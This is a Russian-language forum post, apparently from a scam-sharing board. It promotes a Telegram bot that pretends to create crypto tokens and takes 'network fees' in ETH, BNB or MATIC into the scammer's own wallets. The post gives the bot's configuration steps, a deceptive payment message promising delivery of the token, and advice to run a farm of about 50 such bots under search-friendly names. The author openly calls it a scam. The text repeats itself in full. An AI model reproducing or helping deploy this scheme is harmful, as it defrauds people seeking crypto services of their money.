На связи ВОСТОК!
Погнали!
EXCLUSIVE F0R ENDWAY
Скрин:
Скрин был нечитаем, прогнал через upscale, поэтому такой большой)
Короче, суть то в том, что это направление, особенно для скама, нулёвое, по сути
В том плане, что по этому вектору никто не делал ничего, а значит сделаю я
По настройке все просто:
1. TOKEN = 'token' # подставляете свой токен из бот фазер
2. if network == 'ethereum':
fee = 0.1 # Ставите любую комсу, которую наш залетный клиент должен оплатить за создание токена
currency = 'ETH'
elif network == 'bsc':
fee = 0.05 # Ставите любую комсу, которую наш залетный клиент должен оплатить за создание токена
currency = 'BNB'
else:
fee = 0.01 # Ставите любую комсу, которую наш залетный клиент должен оплатить за создание токена
currency = 'MATIC'
3. wallet_addresses = {
'ethereum': '0xYourEthereumWalletAddress', # Подставляете ваш кошелек в эфире
'bsc': '0xYourBSCWalletAddress', # Подставляете ваш кошелек в бск
'polygon': '0xYourPolygonWalletAddress' # Подставляете ваш кошелек в полигоне
Этот кошелек будет выдан в конце процесса, на него наш клиент будет переводить крипту, якобы за оплату комиссии, за создание токена
Некоторые захотят спросить - восток, а почему такой простой бот? Я отвечу - конкретно в ДАННОМ СЛУЧАЕ нужно, на мой взгляд, именно так. Усложнять не нужно.
Сама концепция продумана так, чтоб вопросов не было.
Например:
"Для создания токена FIJIthereum (FIETH) в сети ETHEREUM с общей эмиссией 1000000 и 2 знаками после запятой, вам необходимо оплатить комиссию сети в размере 0.15000000000000002 ETH с того кошелька, на который будет зачислена вся эмиссия выпущенного токена. После оплаты, в течение 12-ти часов токен автоматически поступит на ваш кошелек (с которого вы оплатили комиссию)."
Вопросов не будет, ведь тут указано все, что вся эмиссия будет зачислена автоматом, на кош, с которого оплатили
Это облегчает процесс для юзера и для владельца бота
Нету лишнего общения и вопросов
Окей, Восток, а зачем это и как я могу на этом заработать? Да очень просто! Как я и упомянул - конкуренции ноль, ферму ботов, штук 50 поднимаешь, занимаешь юзеры по ключевым словам типо "TokenCreate / CryptoCreate" и т.п. и ждешь монету
Бот состоит из 1-го файла! EASY
Погнали!
EXCLUSIVE F0R ENDWAY
Скрин:
Скрин был нечитаем, прогнал через upscale, поэтому такой большой)
Короче, суть то в том, что это направление, особенно для скама, нулёвое, по сути
В том плане, что по этому вектору никто не делал ничего, а значит сделаю я
По настройке все просто:
1. TOKEN = 'token' # подставляете свой токен из бот фазер
2. if network == 'ethereum':
fee = 0.1 # Ставите любую комсу, которую наш залетный клиент должен оплатить за создание токена
currency = 'ETH'
elif network == 'bsc':
fee = 0.05 # Ставите любую комсу, которую наш залетный клиент должен оплатить за создание токена
currency = 'BNB'
else:
fee = 0.01 # Ставите любую комсу, которую наш залетный клиент должен оплатить за создание токена
currency = 'MATIC'
3. wallet_addresses = {
'ethereum': '0xYourEthereumWalletAddress', # Подставляете ваш кошелек в эфире
'bsc': '0xYourBSCWalletAddress', # Подставляете ваш кошелек в бск
'polygon': '0xYourPolygonWalletAddress' # Подставляете ваш кошелек в полигоне
Этот кошелек будет выдан в конце процесса, на него наш клиент будет переводить крипту, якобы за оплату комиссии, за создание токена
Некоторые захотят спросить - восток, а почему такой простой бот? Я отвечу - конкретно в ДАННОМ СЛУЧАЕ нужно, на мой взгляд, именно так. Усложнять не нужно.
Сама концепция продумана так, чтоб вопросов не было.
Например:
"Для создания токена FIJIthereum (FIETH) в сети ETHEREUM с общей эмиссией 1000000 и 2 знаками после запятой, вам необходимо оплатить комиссию сети в размере 0.15000000000000002 ETH с того кошелька, на который будет зачислена вся эмиссия выпущенного токена. После оплаты, в течение 12-ти часов токен автоматически поступит на ваш кошелек (с которого вы оплатили комиссию)."
Вопросов не будет, ведь тут указано все, что вся эмиссия будет зачислена автоматом, на кош, с которого оплатили
Это облегчает процесс для юзера и для владельца бота
Нету лишнего общения и вопросов
Окей, Восток, а зачем это и как я могу на этом заработать? Да очень просто! Как я и упомянул - конкуренции ноль, ферму ботов, штук 50 поднимаешь, занимаешь юзеры по ключевым словам типо "TokenCreate / CryptoCreate" и т.п. и ждешь монету
Бот состоит из 1-го файла! EASY
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.